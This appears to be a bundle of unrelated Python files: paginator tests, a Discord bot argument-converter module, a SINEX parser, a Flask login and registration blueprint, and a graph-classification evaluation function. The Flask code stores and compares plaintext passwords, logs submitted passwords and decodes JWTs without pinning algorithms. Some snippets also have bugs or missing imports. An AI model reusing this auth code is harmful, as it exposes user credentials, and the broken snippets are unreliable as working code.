self._network_throughput_in_mbps = network_throughput_in_mbps
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
<filename>tests/helpers/test_paginator.py
""" Tests for the Paginator
"""
import pytest
from unittest.mock import Mock, call
from styler_rest_framework.helpers.paginator import \
Paginator, InvalidParameterError
class TestInit:
""" Tests for constructor
"""
def test_init_a_paginator(self):
pag = Paginator(limit=10, page=1)
assert isinstance(pag, Paginator)
def test_init_a_paginator_with_none(self):
pag = Paginator(limit=None, page=None)
assert isinstance(pag, Paginator)
assert pag._current == 1
assert pag._limit == 20
def test_invalid_limit(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit=-1, page=1)
assert str(expected.value) == 'Invalid limit'
def test_invalid_limit_type(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit='aaa', page=1)
assert str(expected.value) == 'Invalid limit'
def test_invalid_page(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit=10, page=-1)
assert str(expected.value) == 'Invalid page'
def test_invalid_page_type(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit=10, page='aaa')
assert str(expected.value) == 'Invalid page'
class TestGetPage:
""" Tests for get_page
"""
def test_normal_flow(self):
""" It should return the item page without errors
"""
query = Mock()
query.count.return_value = 100
query.offset.return_value = query
query.limit.return_value = query
query.all.return_value = [1, 2, 3]
pag = Paginator(limit=10, page=1)
result = pag.get_page(query)
assert result == [1, 2, 3]
assert query.count.call_count == 1
assert call(0) in query.offset.mock_calls
assert call(10) in query.limit.mock_calls
def test_invalid_page(self):
""" It should raise an exception
"""
query = Mock()
query.count.return_value = 5
query.offset.return_value = query
query.limit.return_value = query
query.all.return_value = [1, 2, 3]
pag = Paginator(limit=10, page=2)
with pytest.raises(InvalidParameterError) as expected:
_ = pag.get_page(query)
assert str(expected.value) == 'Invalid page'
assert query.count.call_count == 1
assert query.offset.call_count == 0
assert query.limit.call_count == 0
class TestGetInfo:
""" Tests for get_info
"""
def test_get_info(self):
query = Mock()
query.count.return_value = 100
query.offset.return_value = query
query.limit.return_value = query
query.all.return_value = [1, 2, 3]
pag = Paginator(limit=10, page=3)
pag.get_page(query)
info = pag.get_info()
assert info['total_pages'] == 10
assert info['total_number_of_items'] == 100
assert info['current_page'] == 3
assert info['previous_page'] == 2
assert info['next_page'] == 4
def test_none_previous_page(self):
""" Should return None in the previous page if current page == 1
"""
query = Mock()
query.count.return_value = 100
query.offset.return_value = query
query.limit.return_value = query
query.all.return_value = [1, 2, 3]
pag = Paginator(limit=10, page=1)
pag.get_page(query)
info = pag.get_info()
assert info['total_pages'] == 10
assert info['total_number_of_items'] == 100
assert info['current_page'] == 1
assert info['previous_page'] is None
assert info['next_page'] == 2
def test_none_next_page(self):
""" Should return None in the next page if current page == total_pages
"""
query = Mock()
query.count.return_value = 100
query.offset.return_value = query
query.limit.return_value = query
query.all.return_value = [1, 2, 3]
pag = Paginator(limit=10, page=10)
pag.get_page(query)
info = pag.get_info()
assert info['total_pages'] == 10
assert info['total_number_of_items'] == 100
assert info['current_page'] == 10
assert info['previous_page'] == 9
assert info['next_page'] is None
|
<filename>tanjun/conversion.py<gh_stars>0
# -*- coding: utf-8 -*-
# cython: language_level=3
# BSD 3-Clause License
#
# Copyright (c) 2020-2021, Faster Speeding
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import annotations
__all__: list[str] = [
"ArgumentT",
"BaseConverter",
"ChannelConverter",
"ColorConverter",
"EmojiConverter",
"GuildConverter",
"InviteConverter",
"MemberConverter",
"PresenceConverter",
"RoleConverter",
"SnowflakeConverter",
"UserConverter",
"VoiceStateConverter",
"to_channel",
"to_color",
"to_colour",
"to_emoji",
"to_guild",
"to_invite",
"to_invite_with_metadata",
"to_member",
"to_presence",
"to_role",
"to_snowflake",
"to_user",
"to_voice_state",
]
import abc
import datetime
import distutils.util
import operator
import re
import typing
import urllib.parse
import warnings
import hikari
from . import errors
if typing.TYPE_CHECKING:
from collections import abc as collections
from . import abc as tanjun_abc
from . import parsing
ArgumentT = typing.Union[str, int, float]
_ValueT = typing.TypeVar("_ValueT")
class BaseConverter(typing.Generic[_ValueT], abc.ABC):
__slots__ = ()
__implementations: set[BaseConverter[typing.Any]] = set()
async def __call__(self, argument: ArgumentT, ctx: tanjun_abc.Context) -> _ValueT:
return await self.convert(ctx, argument)
def bind_client(self, client: tanjun_abc.Client, /) -> None:
cache_bound = self.cache_bound
if cache_bound and not client.cache:
warnings.warn(
f"Registered converter {self!r} will always fail with a stateless client.",
category=errors.StateWarning,
)
return
if cache_bound and client.shards: # TODO: alternative message when not state bound and wrong intents
required_intents = self.intents
if (required_intents & client.shards.intents) != required_intents:
warnings.warn(
f"Registered converter {type(self).__name__!r} will not run as expected "
f"when {required_intents!r} intent(s) are not declared",
category=errors.StateWarning,
)
def bind_component(self, _: tanjun_abc.Component, /) -> None:
pass
@classmethod
def get_from_type(cls, type_: type[_ValueT], /) -> typing.Optional[BaseConverter[_ValueT]]:
for converter in cls.__implementations:
is_inheritable = converter.is_inheritable()
if is_inheritable and issubclass(type_, converter.types()):
return converter
if not is_inheritable and type_ in converter.types():
return converter
return None
@classmethod
def implementations(cls) -> collections.MutableSet[BaseConverter[typing.Any]]:
return cls.__implementations
@property
@abc.abstractmethod
def cache_bound(self) -> bool: # TODO: replace with cache components
raise NotImplementedError
@abc.abstractmethod
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> _ValueT:
raise NotImplementedError
@property
@abc.abstractmethod
def intents(self) -> hikari.Intents:
raise NotImplementedError
@classmethod
@abc.abstractmethod
def is_inheritable(cls) -> bool: # TODO: will this ever actually work when true?
raise NotImplementedError # or do we want to assert specific idk channel types
@classmethod
@abc.abstractmethod
def types(cls) -> tuple[type[typing.Any], ...]:
raise NotImplementedError
class ChannelConverter(BaseConverter[hikari.PartialChannel]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.PartialChannel:
channel_id = parse_channel_id(argument, message="No valid channel mention or ID found")
if ctx.client.cache and (channel := ctx.client.cache.get_guild_channel(channel_id)):
return channel
try:
return await ctx.rest.fetch_channel(channel_id)
except hikari.NotFoundError:
raise ValueError("Couldn't find channel") from None
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILDS
@classmethod
def is_inheritable(cls) -> bool:
return True
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.PartialChannel,)
class ColorConverter(BaseConverter[hikari.Color]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return False
async def convert(self, _: tanjun_abc.Context, argument: ArgumentT, /) -> typing.Any:
if isinstance(argument, str):
values = argument.split(" ")
if all(value.isdigit() for value in values):
return hikari.Color.of(*map(int, values))
return hikari.Color.of(*values)
return hikari.Color.of(argument)
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.NONE
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.Color,)
class EmojiConverter(BaseConverter[hikari.KnownCustomEmoji]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.KnownCustomEmoji:
emoji_id = parse_emoji_id(argument, message="No valid emoji or emoji ID found")
if ctx.client.cache and (emoji := ctx.client.cache.get_emoji(emoji_id)):
return emoji
if ctx.guild_id:
try:
return await ctx.rest.fetch_emoji(ctx.guild_id, emoji_id)
except hikari.NotFoundError:
pass
raise ValueError("Couldn't find emoji")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILD_EMOJIS
@classmethod
def is_inheritable(cls) -> bool:
return True
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.CustomEmoji,)
class GuildConverter(BaseConverter[hikari.Guild]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Guild:
guild_id = parse_snowflake(argument, message="No valid guild ID found")
if ctx.client.cache:
if guild := ctx.client.cache.get_guild(guild_id):
return guild
try:
return await ctx.rest.fetch_guild(guild_id)
except hikari.NotFoundError:
pass
raise ValueError("Couldn't find guild")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILDS
@classmethod
def is_inheritable(cls) -> bool:
return True
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.Guild,)
class InviteConverter(BaseConverter[hikari.Invite]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Invite:
if ctx.client.cache and isinstance(argument, str):
if invite := ctx.client.cache.get_invite(argument):
return invite
raise ValueError("Couldn't find invite")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILD_INVITES
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.Invite,)
class InviteWithMetadataConverter(BaseConverter[hikari.InviteWithMetadata]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.InviteWithMetadata:
if ctx.client.cache and isinstance(argument, str):
if invite := ctx.client.cache.get_invite(argument):
return invite
raise ValueError("Couldn't find invite")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILD_INVITES
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.InviteWithMetadata,)
class MemberConverter(BaseConverter[hikari.Member]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Member:
if ctx.guild_id is None:
raise ValueError("Cannot get a member from a DM channel")
try:
member_id = parse_user_id(argument, message="No valid user mention or ID found")
except ValueError:
if isinstance(argument, str):
try:
return (await ctx.rest.search_members(ctx.guild_id, argument))[0]
except (hikari.NotFoundError, IndexError):
pass
else:
if ctx.client.cache:
if member := ctx.client.cache.get_member(ctx.guild_id, member_id):
return member
try:
return await ctx.rest.fetch_member(ctx.guild_id, member_id)
except hikari.NotFoundError:
pass
raise ValueError("Couldn't find member in this guild")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILD_MEMBERS
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.Member,)
class PresenceConverter(BaseConverter[hikari.MemberPresence]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILD_PRESENCES
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.MemberPresence,)
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.MemberPresence:
if ctx.guild_id is None:
raise ValueError("Cannot get a presence from a DM channel")
if ctx.client.cache:
user_id = parse_user_id(argument, message="No valid member mention or ID found")
if user := ctx.client.cache.get_presence(ctx.guild_id, user_id):
return user
raise ValueError("Couldn't find presence in current guild")
class RoleConverter(BaseConverter[hikari.Role]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Role:
role_id = parse_role_id(argument, message="No valid role mention or ID found")
if ctx.client.cache:
if role := ctx.client.cache.get_role(role_id):
return role
if ctx.guild_id:
for role in await ctx.rest.fetch_roles(ctx.guild_id):
if role.id == role_id:
return role
raise ValueError("Couldn't find role")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILDS
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.Role,)
class _IDMatcher(typing.Protocol):
def __call__(self, value: ArgumentT, /, *, message: str = "No valid mention or ID found") -> hikari.Snowflake:
raise NotImplementedError
def make_snowflake_parser(regex: re.Pattern[str], /) -> _IDMatcher:
def parse(value: ArgumentT, /, *, message: str = "No valid mention or ID found") -> hikari.Snowflake:
result: typing.Optional[hikari.Snowflake] = None
if isinstance(value, str):
if value.isdigit():
result = hikari.Snowflake(value)
else:
capture = next(regex.finditer(value), None)
result = hikari.Snowflake(capture.groups()[0]) if capture else None
if result is None:
try:
result = hikari.Snowflake(operator.index(message))
except (TypeError, ValueError):
pass
# We should also range check the provided ID.
if result is not None and hikari.Snowflake.min() <= result <= hikari.Snowflake.max():
return result
raise ValueError(message) from None
return parse
parse_snowflake = make_snowflake_parser(re.compile(r"<[@&?!#a]{0,3}(?::\w+:)?(\d+)>"))
parse_channel_id = make_snowflake_parser(re.compile(r"<#(\d+)>"))
parse_emoji_id = make_snowflake_parser(re.compile(r"<a?:\w+:(\d+)>"))
parse_role_id = make_snowflake_parser(re.compile(r"<@&(\d+)>"))
parse_user_id = make_snowflake_parser(re.compile(r"<@!?(\d+)>"))
class SnowflakeConverter(BaseConverter[hikari.Snowflake]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return False
async def convert(self, _: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Snowflake:
return parse_snowflake(argument, message="No valid ID found")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.NONE
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.Snowflake,)
class UserConverter(BaseConverter[hikari.User]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.User:
user_id = parse_user_id(argument, message="No valid user mention or ID found")
if ctx.client.cache:
if user := ctx.client.cache.get_user(user_id):
return user
try:
return await ctx.rest.fetch_user(user_id)
except hikari.NotFoundError:
pass
raise ValueError("Couldn't find user")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILD_MEMBERS
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.User,)
class VoiceStateConverter(BaseConverter[hikari.VoiceState]):
__slots__ = ()
@property
def cache_bound(self) -> bool:
return True
async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.VoiceState:
if ctx.guild_id is None:
raise ValueError("Cannot get a voice state from a DM channel")
if ctx.client.cache:
user_id = parse_user_id(argument, message="No valid user mention or ID found")
if user := ctx.client.cache.get_voice_state(ctx.guild_id, user_id):
return user
raise ValueError("Voice state couldn't be found for current guild")
@property
def intents(self) -> hikari.Intents:
return hikari.Intents.GUILD_VOICE_STATES
@classmethod
def is_inheritable(cls) -> bool:
return False
@classmethod
def types(cls) -> tuple[type[typing.Any], ...]:
return (hikari.VoiceState,)
def _build_url_parser(callback: collections.Callable[[str], _ValueT], /) -> collections.Callable[[str], _ValueT]:
def parse(value: str, /) -> _ValueT:
if value.startswith("<") and value.endswith(">"):
value = value[1:-1]
return callback(value)
return parse
defragment_url = _build_url_parser(urllib.parse.urldefrag)
parse_url = _build_url_parser(urllib.parse.urlparse)
split_url = _build_url_parser(urllib.parse.urlsplit)
_DATETIME_REGEX = re.compile(r"<-?t:(\d+)(?::\w)?>")
def convert_datetime(value: str, /) -> datetime.datetime:
try:
timestamp = int(next(_DATETIME_REGEX.finditer(value)).groups()[0])
except StopIteration:
raise ValueError("Not a valid datetime") from None
return datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc)
_TYPE_OVERRIDES: dict[collections.Callable[..., typing.Any], collections.Callable[[str], typing.Any]] = {
bool: distutils.util.strtobool,
bytes: lambda d: bytes(d, "utf-8"),
bytearray: lambda d: bytearray(d, "utf-8"),
datetime.datetime: convert_datetime,
hikari.Snowflake: parse_snowflake,
urllib.parse.DefragResult: defragment_url,
urllib.parse.ParseResult: parse_url,
urllib.parse.SplitResult: split_url,
}
def override_type(cls: parsing.ConverterSig, /) -> parsing.ConverterSig:
return _TYPE_OVERRIDES.get(cls, cls)
to_channel: typing.Final[ChannelConverter] = ChannelConverter()
"""Convert user input to a `hikari.channels.PartialChannel` object."""
to_color: typing.Final[ColorConverter] = ColorConverter()
"""Convert user input to a `hikari.colors.Color` object."""
to_colour: typing.Final[ColorConverter] = to_color
"""Convert user input to a `hikari.colors.Color` object."""
to_emoji: typing.Final[EmojiConverter] = EmojiConverter()
"""Convert user input to a cached `hikari.emojis.KnownCustomEmoji` object."""
to_guild: typing.Final[GuildConverter] = GuildConverter()
"""Convert user input to a `hikari.guilds.Guild` object."""
to_invite: typing.Final[InviteConverter] = InviteConverter()
"""Convert user input to a cached `hikari.invites.InviteWithMetadata` object."""
to_invite_with_metadata: typing.Final[InviteWithMetadataConverter] = InviteWithMetadataConverter()
"""Convert user input to a `hikari.invites.Invite` object."""
to_member: typing.Final[MemberConverter] = MemberConverter()
"""Convert user input to a `hikari.guilds.Member` object."""
to_presence: typing.Final[PresenceConverter] = PresenceConverter()
"""Convert user input to a cached `hikari.presences.MemberPresence`."""
to_role: typing.Final[RoleConverter] = RoleConverter()
"""Convert user input to a `hikari.guilds.Role` object."""
to_snowflake: typing.Final[SnowflakeConverter] = SnowflakeConverter()
"""Convert user input to a `hikari.snowflakes.Snowflake`.
.. note::
This also range validates the input.
"""
to_user: typing.Final[UserConverter] = UserConverter()
"""Convert user input to a `hikari.users.User` object."""
to_voice_state: typing.Final[VoiceStateConverter] = VoiceStateConverter()
"""Convert user input to a cached `hikari.voices.VoiceState`."""
for _value in vars().copy().values():
if isinstance(_value, BaseConverter):
BaseConverter.implementations().add(typing.cast("BaseConverter[typing.Any]", _value))
del _value
|
<gh_stars>10-100
"""A parser for reading data from igs.snx file based on IGS sitelog files in SINEX format
Example:
--------
from midgard import parsers
p = parsers.parse_file(parser_name='gnss_sinex_igs', file_path='igs.snx')
data = p.as_dict()
Description:
------------
Reads station information (e.g. approximated station coordinates, receiver and antenna type, station eccentricities,
...) igs.snx file in SINEX format.
"""
# Midgard imports
from midgard.dev import plugins
# Where imports
from midgard.parsers._parser_sinex import SinexParser
@plugins.register
class IgsSnxParser(SinexParser):
"""A parser for reading data from igs.snx file based on IGS sitelog files in SINEX format
site - Site dictionary, whereby keys are the site identifiers and values are a site entry
dictionary with the keys 'site_antenna', 'site_eccentricity', 'site_id' and 'site_receiver'. The
site dictionary has following structure:
self.site[site] = { 'site_antenna': [], # SITE/ANTENNA SINEX block information
'site_eccentricity': [], # SITE/ECCENTRICITY block information
'site_id': {}, # SITE/ID block information
'site_receiver': [], # SITE/RECEIVER block information }
with the site entry dictionary entries
site_antenna[ii] = { 'point_code': point_code,
'soln': soln,
'obs_code': obs_code,
'start_time': start_time,
'end_time': end_time,
'antenna_type': antenna_type,
'radome_type': radome_type,
'serial_number': serial_number }
site_eccentricity[ii] = { 'point_code': point_code,
'soln': soln,
'obs_code': obs_code,
'start_time': start_time,
'end_time': end_time,
'reference_system': reference_system,
'vector_1': vector_1,
'vector_2': vector_2,
'vector_3': vector_3,
'vector_type': UNE }
site_id = { 'point_code': point_code,
'domes': domes,
'marker': marker,
'obs_code': obs_code,
'description': description,
'approx_lon': approx_lon,
'approx_lat': approx_lat,
'approx_height': approx_height }
site_receiver[ii] = { 'point_code': point_code,
'soln': soln,
'obs_code': obs_code,
'start_time': start_time,
'end_time': end_time,
'receiver_type': receiver_type,
'serial_number': serial_number,
'firmware': firmware }
The counter 'ii' ranges from 0 to n and depends on how many antenna type, receiver type and
antenna monument changes were done at each site. Note also, that time entries (e.g. start_time,
end_time) are given in Modified Julian Date. If the time is defined as 00:000:00000 in the SINEX
file, then the value is saved as 'None' in the Sinex class.
"""
def setup_parser(self):
return (
self.site_id,
self.site_receiver,
self.site_antenna,
self.site_gps_phase_center,
self.site_eccentricity,
self.satellite_id,
self.satellite_phase_center,
)
def parse_site_id(self, data):
"""Parse SITE/ID SINEX block
"""
for d in data:
site_key = d["site_code"]
self.data.setdefault(site_key, dict())
self.data[site_key].setdefault("site_id", dict())
self.data[site_key]["site_id"] = {n: d[n] for n in d.dtype.names}
def parse_site_antenna(self, data):
"""Parse SITE/ANTENNA SINEX block
"""
for d in data:
site_key = d["site_code"]
# TODO_hjegei: How to remove d['site_code'] from d?
add_dict = {n: d[n] for n in d.dtype.names} # Generate dictionary with all SINEX field entries
add_dict["antenna_type"], add_dict["radome_type"] = d["antenna_type"].split()
self.data.setdefault(site_key, dict())
self.data[site_key].setdefault("site_antenna", list())
self.data[site_key]["site_antenna"].append(add_dict)
def parse_site_receiver(self, data):
"""Parse SITE/RECEIVER SINEX block
"""
for d in data:
site_key = d["site_code"]
# TODO_hjegei: How to remove d['site_code'] from d?
self.data.setdefault(site_key, dict())
self.data[site_key].setdefault("site_receiver", list())
self.data[site_key]["site_receiver"].append({n: d[n] for n in d.dtype.names})
def parse_site_eccentricity(self, data):
"""Parse SITE/ECCENTRICITY SINEX block
"""
for d in data:
site_key = d["site_code"]
# TODO_hjegei: How to remove d['site_code'] from d?
self.data.setdefault(site_key, dict())
self.data[site_key].setdefault("site_eccentricity", list())
self.data[site_key]["site_eccentricity"].append({n: d[n] for n in d.dtype.names})
# TODO: Improve handling of SITE/GPS_PHASE_CENTER, SATELLITE/ID and SATELLITE/PHASE_CENTER
# SINEX block.
|
from flask import jsonify, abort, Blueprint, request, make_response
import os
import re
import sys
import uuid
import jwt
from datetime import datetime, timedelta
build_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(build_path)
from configuration import SECRET_KEY
from src.models import Customer
from src.db_utils import Session
from src.logger import get_logger
logger = get_logger("web_app")
auth_blueprint = Blueprint("auth", __name__)
@auth_blueprint.route("/customers/login", methods=["POST"])
def authenticate_customer_login():
"""
Authenticate the customer login
"""
logger.debug("[authenticate_customer_login] At the Customer login place")
form_data = request.get_json()
logger.debug(f"[authenticate_customer_login] Posted form data is : {form_data} ")
session = None
result = {"customer_info": {}}
try:
session = Session()
customer = session.query(Customer).filter(Customer.email_id == form_data["email_id"]).first()
if customer:
if customer.password == form_data["password"]:
result["customer_info"] = customer.to_dict()
token = jwt.encode(dict(public_id=customer.public_id,
exp=datetime.utcnow() + timedelta(minutes=300)),
SECRET_KEY)
result["token"] = token.decode("UTF-8")
logger.debug(f"[authenticate_customer_login] The result prepared is :: {result}")
return result
else:
abort(make_response(jsonify(message="Invalid password provided."), 401))
else:
abort(make_response(jsonify(message="Email address not registered."), 401))
except ValueError as ve:
logger.exception("[authenticate_customer_login] ValueError: {}".format(ve))
finally:
if session:
session.close()
abort(make_response(jsonify(message="Invalid details provided."), 401))
@auth_blueprint.route("/customer/login/status", methods=["GET"])
def check_customer_login_status():
token = None
session = None
current_customer_info = None
# jwt is passed in the request header
if 'Authorization' in request.headers:
token = request.headers['Authorization']
token = re.sub("^(Bearer )", "", token)
logger.debug(f"[check_customer_login_status] token received is ::: {token}")
# return 401 if token is not passed
else:
return jsonify({'message': 'Token is missing !!'}), 401
logger.debug(f"[check_customer_login_status] Decoding the token !! {token}")
try:
# decoding the payload to fetch the stored details
data = jwt.decode(token, SECRET_KEY)
logger.debug(f"[check_customer_login_status] The data[public_id] decoded is ::: {data['public_id']}")
session = Session()
current_customer = session.query(Customer).filter_by(public_id=data['public_id']).first()
current_customer_info = current_customer.to_dict()
except Exception as ex:
logger.exception(f"[token_required] Error decoding the data ::: {ex}")
return jsonify({'message': 'Token is invalid !!'}), 401
finally:
if session:
session.close()
# returns the current logged in customers context to the routes
return {"customer_info": current_customer_info}
@auth_blueprint.route("/customers/register", methods=["POST"])
def register_customer():
session = None
form_data = request.get_json()
logger.debug(f"[register_customer ]In the creation of the Customer : {form_data}")
try:
session = Session()
existing_customer = session.query(Customer).filter(Customer.email_id == form_data["email_id"]).first()
if existing_customer:
abort(make_response(jsonify(message='Email Address already registered, Try Login'), 401))
if not form_data.get("username"):
form_data["username"] = form_data["email_id"].split("@")[0]
if not form_data.get("display_name"):
form_data["display_name"] = form_data["email_id"].split("@")[0]
new_customer_info = Customer(display_name=form_data["display_name"],
username=form_data["display_name"],
email_id=form_data["email_id"],
password=form_data["password"])
new_customer_info.public_id = str(uuid.uuid4())
if not new_customer_info.display_name:
new_customer_info.display_name = new_customer_info.email_id.split("@")[0]
session.add(new_customer_info)
logger.debug(f"[register_customer] Customer added to database response is :: {new_customer_info}")
session.commit()
result = {"customer_info": new_customer_info.to_dict()}
logger.debug(f"[register_customer] The result prepared is :: {result}")
token = jwt.encode(dict(public_id=new_customer_info.public_id, exp=datetime.utcnow() + timedelta(minutes=300)),
SECRET_KEY)
result["token"] = token.decode("UTF-8")
return result
except ValueError as ex:
logger.exception(f"[register_customer] Exception: {ex}")
finally:
if session:
session.close()
|
<gh_stars>1-10
from __future__ import division
from sklearn.preprocessing import label_binarize
#LINK-Logistic Regression [Zheleva, Getoor, 2009] uses labelled nodes to fit a regularized logistic regression model
#(Supplementary Note 2.2) that interprets rows of the adjacency matrix as sparse binary feature vectors,
#performing classification based on these features. The trained model is then applied to the feature vectors
#(adjacency matrix rows) of unlabelled nodes, which are scored based on the probability
# estimates from themodel.
def LINK(num_unlabeled, membership_y, feature_x, clf, num_iter, cv_setup=None):
class_labels = np.sort(np.unique(np.array(membership_y))) #unique label IDs
mean_accuracy = []
se_accuracy = []
mean_micro_auc = []
se_micro_auc = []
mean_wt_auc = []
se_wt_auc = []
for i in range(len(num_unlabeled)):
print(num_unlabeled[i])
if cv_setup=='stratified':
k_fold = cross_validation.StratifiedShuffleSplit((membership_y), n_iter=num_iter,
test_size=num_unlabeled[i],
random_state=0)
else:
k_fold = cross_validation.ShuffleSplit(len(membership_y), n_iter=num_iter,
test_size=num_unlabeled[i],
random_state=0)
accuracy = []
micro_auc = []
wt_auc = []
for k, (train, test) in enumerate(k_fold):
#if k==0:
#print train
clf.fit(feature_x[train], np.ravel(membership_y[train]))
pred = clf.predict(feature_x[test])
prob = clf.predict_proba(feature_x[test])
#accuracy.append(metrics.accuracy_score(membership_y[test], pred, normalize = True))
labeled_data = np.copy(np.array(membership_y))
ground_truth_testing = np.array(labeled_data)[test]
labeled_data[test]=np.max(class_labels)+1 # ignore testing labels -- don't have access as part of training -- want to assing test label outside of possible training labels
accuracy_score_benchmark = np.mean(np.array(labeled_data)[train] == np.max(class_labels))
# auc scores
if len(np.unique(membership_y))>2:
micro_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test],np.unique(membership_y)), prob, average = 'micro'))
wt_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test],np.unique(membership_y)), prob,
average = 'weighted'))
else:
micro_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test],np.unique(membership_y)),
prob[:,1],average='micro'))
wt_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test],np.unique(membership_y)),
prob[:,1],average='weighted'))
y_true = label_binarize(membership_y[test],np.unique(membership_y))
y_pred = np.array(((prob[:,1]) >accuracy_score_benchmark)+0)
accuracy.append(f1_score(y_true, y_pred, average='macro'))#, pos_label=1) )
tn, fp, fn, tp = confusion_matrix(label_binarize(membership_y[test],np.unique(membership_y)),
((prob[:,1]) >accuracy_score_benchmark)+0).ravel()
#accuracy.append((tn/(fp+tn)*0.5 + tp/(tp+fn))*0.5)
mean_accuracy.append(np.mean(accuracy))
se_accuracy.append(np.std(accuracy))
mean_micro_auc.append(np.mean(micro_auc))
se_micro_auc.append(np.std(micro_auc))
mean_wt_auc.append(np.mean(wt_auc))
se_wt_auc.append(np.std(wt_auc))
return(mean_accuracy, se_accuracy, mean_micro_auc,se_micro_auc, mean_wt_auc,se_wt_auc)
|
<filename>bigmacs_naive/adam_save_slr.py
#!/usr/bin/env python
#########################
#
# Save slr offsets to the photometry database
#
##########################
import unittest, sys, os, optparse, re
import pyfits, numpy as np
sys.path.append('/u/ki/awright/bonnpipeline/')
import photometry_db, ldac, adam_utilities
##########################
__cvs_id__ = "$Id: save_slr.py,v 1.2 2010-09-01 01:38:56 dapple Exp $"
##########################
##################################################
### Photometry Global Database
##################################################
class Phot_db(object):
'''Provide lazy, proxy access to the photometry database of choice'''
def __init__(self, db, *args, **keywords):
self.db = db
self.instance = None
self.args = args
